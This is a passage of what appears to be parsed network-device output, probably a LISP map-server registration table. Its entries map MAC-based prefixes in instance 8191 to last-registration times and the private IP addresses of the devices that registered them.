"who_last_registered": "10.8.129.94:39184",
"inst_id": 8191,
},
"64f6.9dff.8668/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"64f6.9dff.8b20/48": {
"last_register": "04:02:53",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"682c.7bff.556b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"682c.7bff.55dd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"682c.7bff.55ec/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"682c.7bff.55fe/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"682c.7bff.589e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"682c.7bff.7736/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.252:16799",
"inst_id": 8191,
},
"682c.7bff.9ee7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.252:16799",
"inst_id": 8191,
},
"682c.7bff.a3af/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"682c.7bff.a463/48": {
"last_register": "00:36:44",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"682c.7bff.a841/48": {
"last_register": "09:56:41",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"682c.7bff.aaa5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"682c.7bff.acc7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"682c.7bff.aeb3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"682c.7bff.b09c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"682c.7bff.b012/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"682c.7bff.b18c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"682c.7bff.b1d7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"682c.7bff.b1e9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"682c.7bff.b261/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"682c.7bff.b285/48": {
"last_register": "01:56:00",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"682c.7bff.b28b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"682c.7bff.b3ab/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"682c.7bff.b3b1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"682c.7bff.b336/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"682c.7bff.b35a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"682c.7bff.b4ce/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"682c.7bff.b411/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"682c.7bff.b438/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"682c.7bff.b5dc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"682c.7bff.b51c/48": {
"last_register": "03:41:14",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"6886.a7ff.e080/48": {
"last_register": "1d01h",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"6886.a7ff.e14e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.252:16799",
"inst_id": 8191,
},
"6886.a7ff.e287/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.172:11801",
"inst_id": 8191,
},
"6886.a7ff.f68e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"68bd.abff.4b18/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.179:15443",
"inst_id": 8191,
},
"68bd.abff.bfba/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"68bd.abff.c1c1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8191,
},
"6c6c.d3ff.4497/48": {
"last_register": "1d03h",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"6c71.0dff.3759/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"6c71.0dff.47e9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.172:11801",
"inst_id": 8191,
},
"6c71.0dff.7f63/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"6c71.0dff.86b0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"7001.b5ff.962d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"7001.b5ff.9776/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"7001.b5ff.97b0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"7001.b5ff.9739/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"7001.b5ff.973d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"7001.b5ff.9755/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"7001.b5ff.988c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"7001.b5ff.988e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"7001.b5ff.9894/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"7001.b5ff.9896/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"7001.b5ff.65109/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"7001.b5ff.99b4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"7001.b5ff.99cc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"7001.b5ff.990b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"7001.b5ff.a245/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"7001.b5ff.a6e0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"7001.b5ff.e9b8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"7001.b5ff.f4ad/48": {
"last_register": "06:18:28",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"700b.4fff.0274/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"7035.09ff.68f2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"7035.09ff.6caf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"7035.09ff.9745/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"7035.09ff.106c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"706e.6dff.b286/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"706e.6dff.b386/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"70e4.22ff.492f/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"70e4.22ff.4967/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"70e4.22ff.1b6e/48": {
"last_register": "2d00h",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"70f0.96ff.3eca/48": {
"last_register": "1d22h",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"7426.acff.f513/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"7426.acff.f5c2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"7426.acff.f899/48": {
"last_register": "4d16h",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"7488.bbff.1a0c/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"7488.bbff.c15d/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"7488.bbff.d507/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"74a0.2fff.57cb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"74a0.2fff.5d12/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"74a0.2fff.6c37/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"74a0.2fff.6e4a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"74a0.2fff.73f1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"74a0.2fff.75be/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"74a0.2fff.7ae9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"74a0.2fff.ada2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"74a0.2fff.bc84/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"74a0.2fff.bedc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"7802.b1ff.be7e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"7872.5dff.7bd9/48": {
"last_register": "1d05h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"7872.5dff.4c63/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"7872.5dff.0055/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"78da.6eff.42e0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"7c95.f3ff.c98c/48": {
"last_register": "00:23:00",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"80e8.6fff.be14/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"881d.fcff.57f7/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"881d.fcff.6f13/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"881d.fcff.7566/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"8843.e1ff.b66b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"8843.e1ff.f0cf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"8843.e1ff.37d0/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"8843.e1ff.82f6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"8875.56ff.7346/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"8875.56ff.74ee/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"8875.56ff.cbc5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.252:16799",
"inst_id": 8191,
},
"8cb6.4fff.45a2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"94d4.69ff.e681/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"94d4.69ff.e606/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"94d4.69ff.e711/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"94d4.69ff.e774/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"9c57.adff.4368/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8191,
},
"9c57.adff.43c8/48": {
"last_register": "10:03:29",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"9c57.adff.43ec/48": {
"last_register": "01:43:20",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"9c57.adff.447c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8191,
},
"9c57.adff.44a2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8191,
},
"9c57.adff.44c6/48": {
"last_register": "00:02:16",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"9c57.adff.44ee/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8191,
},
"9c57.adff.4401/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"9c57.adff.4518/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"9c57.adff.453f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8191,
},
"9c57.adff.4558/48": {
"last_register": "1d02h",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"9c57.adff.456f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8191,
},
"9c57.adff.4577/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8191,
},
"9c57.adff.4657/48": {
"last_register": "00:09:33",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"9c57.adff.465e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"9c57.adff.46ec/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"9c57.adff.4743/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"9c57.adff.47ad/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.29:37127",
"inst_id": 8191,
},
"9c57.adff.47ae/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"9c57.adff.47f1/48": {
"last_register": "3d16h",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"9c57.adff.4917/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"9c57.adff.494c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"9c57.adff.4a15/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"9c57.adff.4abe/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"9c57.adff.4ac5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8191,
},
"a456.30ff.041f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"a46c.2aff.f113/48": {
"last_register": "2d03h",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"a89d.21ff.83ba/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"a89d.21ff.9c56/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"a89d.21ff.9c64/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"a89d.21ff.9c6c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"ac7e.8aff.ccb2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"ac7e.8aff.db40/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"ac7e.8aff.ed9e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"ac7e.8aff.eee3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"ac7e.8aff.f7fd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"ac7e.8aff.f73c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"ac7e.8aff.1518/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"ac7e.8aff.1b8e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"ac7e.8aff.3f10/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"ac7e.8aff.52b6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"ac7e.8aff.585c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"ac7e.8aff.5868/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"ac7e.8aff.5961/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"ac7e.8aff.5a03/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"ac7e.8aff.5cc4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"ac7e.8aff.6372/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"ac7e.8aff.663c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"ac7e.8aff.6837/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"ac7e.8aff.69ab/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"ac7e.8aff.6bc1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"ac7e.8aff.6be5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"ac7e.8aff.6b04/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"ac7e.8aff.75a2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"ac7e.8aff.7c9b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"ac7e.8aff.4217/48": {
"last_register": "2w0d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"ac7e.8aff.428d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"ac7e.8aff.8e74/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"ac7e.8aff.9450/48": {
"last_register": "1d08h",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"ac7e.8aff.94b0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"ac7e.8aff.9750/48": {
"last_register": "1w4d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"ac7e.8aff.b5bf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.252:16799",
"inst_id": 8191,
},
"aca0.16ff.920f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"aca0.16ff.4672/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"aca0.16ff.dd49/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"aca0.16ff.e748/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"b000.b4ff.de10/48": {
"last_register": "2d23h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"b000.b4ff.de79/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"b000.b4ff.e29f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"b026.80ff.3bbb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"b026.80ff.5a89/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"b026.80ff.ec67/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"b026.80ff.ec72/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"b026.80ff.ec7b/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"b8be.bfff.9415/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"bc16.f5ff.523c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"bcf1.f2ff.25b3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"c062.6bff.7d07/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"c40a.cbff.e5ea/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.94:39184",
"inst_id": 8191,
},
"c40a.cbff.4920/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"c414.3cff.3a0e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"c414.3cff.3d6d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8191,
},
"c414.3cff.6101/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"c414.3cff.6129/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"c414.3cff.63f8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"c414.3cff.d74c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.166:31256",
"inst_id": 8191,
},
"c4b3.6aff.77c1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"c4b3.6aff.d501/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"c4b3.6aff.d525/48": {
"last_register": "1w0d",
"up": "yes#",
"who_last_registered": "10.8.129.10:40360",
"inst_id": 8191,
},
"c4b3.6aff.95d7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"c4b3.6aff.a1e0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"cc5a.53ff.26d4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"cc5a.53ff.a5c5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"d057.4cff.1cb2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"d057.4cff.1d09/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.179:15443",
"inst_id": 8191,
},
"d057.4cff.12d9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"d0c2.82ff.7da1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"d0ec.35ff.02a4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
